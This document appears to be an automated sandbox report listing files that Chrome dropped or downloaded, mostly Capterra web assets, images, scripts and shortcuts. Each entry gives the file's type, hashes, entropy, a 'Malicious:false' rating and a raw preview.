                                                                                                                                                                                                        Preview:L..................F.@.. ...$+.,.....&e.....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.Y.....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Y.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Y............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Y............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........N(:O.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Oct 4 12:54:07 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):2693
                                                                                                                                                                                                        Entropy (8bit):4.007583183825685
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:48:8xbwdDTr7sHKidAKZdA14tseh7sFiZUkmgqeh7sOy+BX:8xbATznEy
                                                                                                                                                                                                        MD5:FE41F39AFBF4140E3D52408ECD5DC013
                                                                                                                                                                                                        SHA1:E51898505BBA218F892056EFB5F025FCE420EFC3
                                                                                                                                                                                                        SHA-256:E6E4992DDED5DBA55200C2C8EAAD3639E8839908EA6D4A135038C2E88D94CA7A
                                                                                                                                                                                                        SHA-512:D115B6A190F9FC152BA05567AFA65E24B2DD1055F016EC21AE9E8A2663E088C7740865757518BBB626EFEB30F8169DF1DFCB2554EAAA613BF13E1C43411E532B
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:L..................F.@.. ...$+.,......e>....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.Y.....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Y.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Y............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.VDW.n...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........N(:O.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Aug 30 15:15:33 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):2681
                                                                                                                                                                                                        Entropy (8bit):3.996519015657973
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:48:8mnwdDTr7QHKidAKZdA1vehDiZUkwqehMy+R:8mnATU2y
                                                                                                                                                                                                        MD5:C264435DCFE4804550A2004142AC19B9
                                                                                                                                                                                                        SHA1:AD4BEE914E5020301DAA549070ABD35B21593C87
                                                                                                                                                                                                        SHA-256:6398550DE528D15809CA6860BD417F7DB189CD3291D7FD0D6CDE1135342906E7
                                                                                                                                                                                                        SHA-512:A6861759C8011E9788B28D85DA291C7990DEE356860E4CFA918FA7B0D7129EE8983B6043B076B4621A4C025646C36E48D19DFE6DE7B7814E61E90A111FE0A9FF
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:L..................F.@.. ...$+.,.....O`.....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.Y.....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Y.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Y............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Y............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........N(:O.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Aug 30 15:15:33 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):2681
                                                                                                                                                                                                        Entropy (8bit):3.985214817012339
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:48:8SnwdDTr7QHKidAKZdA1hehBiZUk1W1qehiy+C:8SnAT09Cy
                                                                                                                                                                                                        MD5:E39F1EC51106BB2C02A6DCF31EA651F4
                                                                                                                                                                                                        SHA1:DF0555C52720257E290EF7006DAB03AFB7235DA0
                                                                                                                                                                                                        SHA-256:B52FBFDC9C3ED21B78BD3722CF8948CCEAA14DE6A2464648805E12257F5516F8
                                                                                                                                                                                                        SHA-512:3ACF103D6087F1B2C3E17968799C89C69885D36160E554F3E4C97FC888828ECEDCFB7168BEA491E85CE1182311F00742866DF5C23983E96AA85F677D6CD2D455
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:L..................F.@.. ...$+.,.....nj.....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.Y.....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Y.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Y............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Y............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........N(:O.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Aug 30 15:15:33 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):2683
                                                                                                                                                                                                        Entropy (8bit):3.9959548969047667
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:48:8LnwdDTr7QHKidAKZdA1duT+ehOuTbbiZUk5OjqehOuTbEy+yT+:8LnATaT/TbxWOvTbEy7T
                                                                                                                                                                                                        MD5:EBEFF607EA9A226EB2ED6E3BFB91A9D7
                                                                                                                                                                                                        SHA1:42AF798B43C2E8CC65446D160A924F1E6BC6C13E
                                                                                                                                                                                                        SHA-256:F25777F41337063BC5CDCD44C0EDE646D016D581E09BA1BF61D47C50443E2D0F
                                                                                                                                                                                                        SHA-512:87BF682C454673D1694650269F581DB80F36BCD20062E69BD3151DA2D8F0C3740132F5F1D253017D2007BAF6605644F2736FD6C81B7D3B630D7865E70A105DE0
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:L..................F.@.. ...$+.,......V.....N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.Y.....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y.....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Y.....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Y............................"&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Y............................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i...........N(:O.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:PNG image data, 500 x 610, 8-bit colormap, non-interlaced
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):129281
                                                                                                                                                                                                        Entropy (8bit):7.994367080488959
                                                                                                                                                                                                        Encrypted:true
                                                                                                                                                                                                        SSDEEP:3072:3CXexy1BoEfeSiGmoL0iTQQC7lDUonnAZk1tqfzr1K8kL:3mec13fHiTM0imJAZrLrg7L
                                                                                                                                                                                                        MD5:9505138DF129DCE0DAB3692D3DE59F21
                                                                                                                                                                                                        SHA1:447574F9DC7C84A990850272E3D7D022ED6E2C07
                                                                                                                                                                                                        SHA-256:4CAE660B40F12B34EA4ECBE54ECD11DAF41D4B48702B07B8E13391594F1D0CDD
                                                                                                                                                                                                        SHA-512:2B3FB9628A4E9FAD6B6D2594134351C2CFA61772391212EEC5C9751F7EF6B789D0C7EB81BD1DA7F919D8A19C4201E584AF2015331F0C2A993B9E4A91DF4D172D
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:.PNG........IHDR.......b........{....PLTE...........baa.F...........000..........b!.b..a .a .b .a..a.....`.....a!..........^.....^....._!3-)......=2+...:+%.\..b$9<2@B7....c....!..JF8UF40& 15...n5.kicQ.g,.~I.v>[N;.u( ....H</.R....LL>...q4/.....G0'V0#'-'.f%....R^\L....}.].a.tlXc2 ...kQ6._..c....RSE.l$......\q6!...;'..jJ.u_.._".M)bI2......x@.kCI)..L..sQ.; uW:...V..^.]VD._.]2.k..wTH/.wcG......rJ.]9..V....5......e1.S+.f....:..jYB..k.eC.~.z9...c.zQ.D.0.[=d;.tB(.|,.1..n$.....[(.s9..W.wB.QZ*..=.b=)..._S>%T7...A.u .?..}...S...e(...n3.n.B.......j...M.....O..z.....+.......t..MpF...a...n,.....f./..........}N0.m.u..w..F.E.s<.w7..c.....Y=...[Q....J....f..F.cJ"uS".........u.U..~..Y..f...c..d...... .vuk..u....t....(....../.P.....s.w.s.]...^.R.+..3...{.a.Q....tRNS............v.K..d....pHYs............... .IDATx...#I.7:.3U........s.$+a..#.L".9.B...L(..!.+.A...2J....8;....6...P.s..........^.L}T...?.....>.R*?..9q>...=.=.=.=.=.=.=.
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):5016
                                                                                                                                                                                                        Entropy (8bit):7.476701695584527
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:iaN26MT0D5MdtbZPAVwzVEChBuowV403iJPWK:iNYNMtKwIo+40SsK
                                                                                                                                                                                                        MD5:DAD34823338FCEF5F5FFB3AE33B5A1BE
                                                                                                                                                                                                        SHA1:BB943F268E40D4993683B724AAD38FB9E33C648F
                                                                                                                                                                                                        SHA-256:2F578068A14C14348E1086EACFBCDB26AD525E0E455B0FE3D60C07AC12DC5B6E
                                                                                                                                                                                                        SHA-512:8BE2FCA2E6EC2D371AA6245319AD85DB09826C2A54CD32038A8178B89D014D21E5108918461FDDEB8BA1FC3878AEC1246E774FD0F2E1610A691C5E06799F1298
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://www.capterra.com/assets-capterra-monorepo-bx-capterra-www/_next/image/?url=https%3A%2F%2Fi.vimeocdn.com%2Fvideo%2F588275950-244fb2cb9bf09fea29744f33a17f6ccc6b086555648aa37316f32f0d6be2da70-d_640&w=128&q=75
                                                                                                                                                                                                        Preview:RIFF....WEBPVP8X.... ......G..ICCPH......HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch..............................................desc........IEC 61966-2.1 Default RGB colour space - sRGB............IEC 61966-2.1 Default RGB colour space - sRGB......................desc.......,Reference Viewing Condition in IEC61966-2.1...........,Reference Viewing Condition in IEC61966-2.1........
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (40426), with no line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):40426
                                                                                                                                                                                                        Entropy (8bit):5.27794228641859
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:384:fUdudRdSCUdNKOkY3dxsdjd+QdlkqdXoYjmdvodSHJCRdkdssdQzKd1tdpIdnFez:KCSGYfr1YjKJCgE8hdlY2PC6CeqO
                                                                                                                                                                                                        MD5:D35E0F9D9A801AEFC3AF53D7C33622A2
                                                                                                                                                                                                        SHA1:D2C37F6BF776A04D5CB0B16C2BF612806FB1962C
                                                                                                                                                                                                        SHA-256:845A1B7BCD1FF0E8B91D5502B88ADEDB94D126BC49FCA6FED42902A4D7CCB63D
                                                                                                                                                                                                        SHA-512:3DF83FAF49670EED699A471C4CCFCC99C4FFABEC68DB6B815E88C0808B09FBAD62BE6C8B1CEB15AF6783562614439308473E94564BD5D21D90972D700889F557
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:"use strict";(self.webpackChunk_N_E=self.webpackChunk_N_E||[]).push([[9257],{15962:function(e,t,r){r.d(t,{Z:function(){return h}});var n=r(7653),o=r(57908),a=n.createContext(),i=r(96890);function l(e,t){(null==t||t>e.length)&&(t=e.length);for(var r=0,n=Array(t);r<t;r++)n[r]=e[r];return n}var c=r(10803),u=["className","children"];function s(){return(s=Object.assign?Object.assign.bind():function(e){for(var t=1;t<arguments.length;t++){var r=arguments[t];for(var n in r)Object.prototype.hasOwnProperty.call(r,n)&&(e[n]=r[n])}return e}).apply(this,arguments)}var f=function(e){var t=e.className,r=e.children,l=function(e,t){if(null==e)return{};var r,n,o=function(e,t){if(null==e)return{};var r,n,o={},a=Object.keys(e);for(n=0;n<a.length;n++)r=a[n],t.indexOf(r)>=0||(o[r]=e[r]);return o}(e,t);if(Object.getOwnPropertySymbols){var a=Object.getOwnPropertySymbols(e);for(n=0;n<a.length;n++)r=a[n],!(t.indexOf(r)>=0)&&Object.prototype.propertyIsEnumerable.call(e,r)&&(o[r]=e[r])}return o}(e,u),f=(0,n.useCo
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ISO Media, AVIF Image
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):5798
                                                                                                                                                                                                        Entropy (8bit):7.396758613065603
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:+7jOaL5N26MT0D5MdtbZPAVwzVJd+udnV0+6SHbtzA7C8hRgWWaA05AF:+7CaLoYNMtKwXd+udVZBbIdhRgqFAF
                                                                                                                                                                                                        MD5:AC2B3619D530A443B70634BFD2D5486F
                                                                                                                                                                                                        SHA1:EE7C4D834D5DF812E67435C16404E1805CA969D1
                                                                                                                                                                                                        SHA-256:65FB0F56FC933F86726AFD6D4BB5870C9DB0F7C3329C79647909E2B7BDED83D3
                                                                                                                                                                                                        SHA-512:57CD11B8733A7C4BC43537528DF260E44B12B5AD173F2AEFC90673A02FB270B993CC0D889BC505C967DA4743C5FECA0FF509BCF07884B0D0BAC8555A5A5ADCF7
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://gdm-catalog-fmapi-prod.imgix.net/ProductLogo/5179d6b3-aa3f-403b-8cb4-718850815472.png?w=60&h=60&dpr=2&auto=format
                                                                                                                                                                                                        Preview:... ftypavif....avifmif1miafMA1B....meta.......(hdlr........pict............libavif.....pitm.........,iloc....D..................................Biinf..........infe........av01Color.....infe........av01Alpha.....iref........auxl..........iprp....ipco....ispe.......x...x....pixi............av1C.......Tcolrprof...HLino....mntrRGB XYZ .........1..acspMSFT....IEC sRGB.......................-HP ................................................cprt...P...3desc.......lwtpt........bkpt........rXYZ........gXYZ...,....bXYZ...@....dmnd...T...pdmdd........vued...L....view.......$lumi........meas.......$tech...0....rTRC...<....gTRC...<....bTRC...<....text....Copyright (c) 1998 Hewlett-Packard Company..desc........sRGB IEC61966-2.1............sRGB IEC61966-2.1..................................................XYZ .......Q........XYZ ................XYZ ......o...8.....XYZ ......b.........XYZ ......$.........desc........IEC http://www.iec.ch............IEC http://www.iec.ch............................
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (20800), with no line terminators
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):20800
                                                                                                                                                                                                        Entropy (8bit):4.7023138283752
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:192:vfmqGCxP9cuRBUOh4Cq/Ba1Zg0vpAB6fYt8Gy6CszAROvU9yLsIWjfy0mkzgNdyE:HmqrvqOijNGiJfHAC/RuhrJ9/Ps
                                                                                                                                                                                                        MD5:75D8E22643FFA35716821F01E5F58EF7
                                                                                                                                                                                                        SHA1:3EC593A1BDC1007739B0954B4991054062F38DEB
                                                                                                                                                                                                        SHA-256:70474BABFF21298D152AA1BD9B91315F1006D556DA7EE5BF72EAD94198363E55
                                                                                                                                                                                                        SHA-512:89C3FB6E1F036CBB19DB71C30A9AC4D84BA8DC82AAD49ECF88EE2DDB92D6DDC76E17C194127A50B92C3ED16F68CAF3B9105D3A15F2AC1E252FAAFBFCD16B9A5E
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://reviews.capterra.com/_next/static/css/ad6d42fbadcc79ec.css
                                                                                                                                                                                                        Preview::root{--size-stroke-width-6:6px;--size-stroke-width-5:5px;--size-stroke-width-4:4px;--size-stroke-width-3:3px;--size-stroke-width-2:2px;--size-stroke-width-1:1px;--size-stroke-width-0:0px;--size-letter-spacing-lg:2px;--size-letter-spacing-md:0.4px;--size-letter-spacing-0:0px;--size-border-width-8:8px;--size-border-width-4:4px;--size-border-width-2:2px;--size-border-width-1:1px;--size-border-width-0:0px;--size-border-radius-full:100%;--size-border-radius-10xl:96px;--size-border-radius-9xl:88px;--size-border-radius-8xl:80px;--size-border-radius-7xl:72px;--size-border-radius-6xl:64px;--size-border-radius-5xl:56px;--size-border-radius-4xl:48px;--size-border-radius-3xl:40px;--size-border-radius-2xl:32px;--size-border-radius-xl:24px;--size-border-radius-lg:20px;--size-border-radius-md:16px;--size-border-radius-sm:14px;--size-border-radius-xs:12px;--size-border-radius-2xs:8px;--size-border-radius-3xs:4px;--size-border-radius-4xs:2px;--size-border-radius-0:0px;--size-line-height-3xl:56px;--siz
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (2343)
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):52916
                                                                                                                                                                                                        Entropy (8bit):5.51283890397623
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:768:oHzaMKHBCwsZtisP5XqYofL+qviHOlTjdNoVJDe6VyKaqgYUD0ZTTE8yVfZsk:caMKH125hYiM8O9dNoVJ3N48yVL
                                                                                                                                                                                                        MD5:575B5480531DA4D14E7453E2016FE0BC
                                                                                                                                                                                                        SHA1:E5C5F3134FE29E60B591C87EA85951F0AEA36EE1
                                                                                                                                                                                                        SHA-256:DE36E50194320A7D3EF1ACE9BD34A875A8BD458B253C061979DD628E9BF49AFD
                                                                                                                                                                                                        SHA-512:174E48F4FB2A7E7A0BE1E16564F9ED2D0BBCC8B4AF18CB89AD49CF42B1C3894C8F8E29CE673BC5D9BC8552F88D1D47294EE0E216402566A3F446F04ACA24857A
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://www.google-analytics.com/analytics.js
                                                                                                                                                                                                        Preview:(function(){/*.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/.var n=this||self,p=function(a,b){a=a.split(".");var c=n;a[0]in c||"undefined"==typeof c.execScript||c.execScript("var "+a[0]);for(var d;a.length&&(d=a.shift());)a.length||void 0===b?c=c[d]&&c[d]!==Object.prototype[d]?c[d]:c[d]={}:c[d]=b};function q(){for(var a=r,b={},c=0;c<a.length;++c)b[a[c]]=c;return b}function u(){var a="ABCDEFGHIJKLMNOPQRSTUVWXYZ";a+=a.toLowerCase()+"0123456789-_";return a+"."}var r,v;.function aa(a){function b(k){for(;d<a.length;){var m=a.charAt(d++),l=v[m];if(null!=l)return l;if(!/^[\s\xa0]*$/.test(m))throw Error("Unknown base64 encoding at char: "+m);}return k}r=r||u();v=v||q();for(var c="",d=0;;){var e=b(-1),f=b(0),h=b(64),g=b(64);if(64===g&&-1===e)return c;c+=String.fromCharCode(e<<2|f>>4);64!=h&&(c+=String.fromCharCode(f<<4&240|h>>2),64!=g&&(c+=String.fromCharCode(h<<6&192|g)))}};var w={},y=function(a){w.TAGGING=w.TAGGING||[];w.TAGGING[a]=!0};var ba=Array.isArray,c
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (563)
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):5091
                                                                                                                                                                                                        Entropy (8bit):5.011006748531497
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:+zpHg/ci55bnkpDJyfnWeQUjqsTiAb0MgVnEHOJgluUc7yhUe9PqGpdxEiJTB:+zNg/PvNnWJVLAb0MgVnEHOJAuUvie1n
                                                                                                                                                                                                        MD5:3A8CB3262D3B304CC120A77AE783000B
                                                                                                                                                                                                        SHA1:9BB322A260422724F16035C10FF110BE4890FBF1
                                                                                                                                                                                                        SHA-256:E3DF8AE242043E0C9A6883C684D24C8BC5199B1330D1E371D2296D54F59E4AE9
                                                                                                                                                                                                        SHA-512:BC34B83D2FD90407C90AC1C9BDC312B3D0D1D4A8AA8AD3A906C8AB299F60AE331C91B1B51EE1D4F5D70A95C6082A1E1CFA4BBC06B6B4DED8697D0D39C0888698
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:(function () {. function fixScriptTagsNotExecuting(node) {. if (node.tagName === "SCRIPT") {. node.parentNode.replaceChild(cloneScriptNode(node), node);. } else {. var i = -1,. children = node.childNodes;. while (++i < children.length) {. fixScriptTagsNotExecuting(children[i]);. }. }. return node;.}..function cloneScriptNode(node) {. var script = document.createElement("script");. script.text = node.innerHTML;.. var i = -1,. attrs = node.attributes,. attr;. while (++i < attrs.length) {. script.setAttribute((attr = attrs[i]).name, attr.value);. }. return script;.}.. var state={"modalDisplayFrequency":"Once per user, ever","formId":"7DbjmVSFi4BGlfm43ATGbM","baseUrl":"https://forms-as-a-service.capterra.com","isTest":false,"BETA_BASE_URL":"https://forms-as-a-service.capstage.net","BETA_RATE":0,"modalRestrictedUrls":["/sem/","/sem-compare/","raas.capterra.com","review.capterra.com","reviews.capterra.com","insights.capterra.com","capterra.com/works
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:MS Windows icon resource - 3 icons, 48x48, 32 bits/pixel, 32x32, 32 bits/pixel
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):15086
                                                                                                                                                                                                        Entropy (8bit):2.832642895649505
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:96:jPuUeHEh+yAkizR55zFGQHhLvx6Mm1MQLiinK0POaiBWa:jkxwbS
                                                                                                                                                                                                        MD5:66E842B7DD20398291ECED92664A65D7
                                                                                                                                                                                                        SHA1:FF11116AA61A1FB80CE3D55B08F523273F6CD18E
                                                                                                                                                                                                        SHA-256:E4EB96A815CAD710E1A6EC743185A92A0B11500EB4020C23707AC9F69DD58747
                                                                                                                                                                                                        SHA-512:AD4CF727EC203AD1DBCAA92EFD227E23269BC46CEBA6090DDC340E86E93853E942D4B7AF01DF97F2113A1E07B30AE99321F08FC6942D1ABBD4E76D6D0606AD70
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        URL:https://www.capterra.com/favicon.ico
                                                                                                                                                                                                        Preview:......00.... ..%..6... .... ......%........ .h....6..(...0...`..... ......$...............................................................................................................................................................................................................................................................................................................................................R....@D.........................................................................................................................................................................................N...S......................................................................................................................................................................................U...N...Z...U..................................................................................................................................................................................M.L.N...[...i?..
                                                                                                                                                                                                        Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (15203), with no line terminators
                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                        Size (bytes):15203
                                                                                                                                                                                                        Entropy (8bit):5.241773285592657
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:384:PKVMDCfCkVsL/cacMVV+CjcvKYysVkObyVFlGVlm:DCfCHLANSYyQMP
                                                                                                                                                                                                        MD5:B86B7BE7EF763E6EFDD039EFE5796548
                                                                                                                                                                                                        SHA1:944302C1C2BC9C8B1DAC2FDF02E0DB0209168DB9
                                                                                                                                                                                                        SHA-256:A92AE25754346ECB64821487319A6BDDE99595BEDEEE583D4C0140E2C5225350
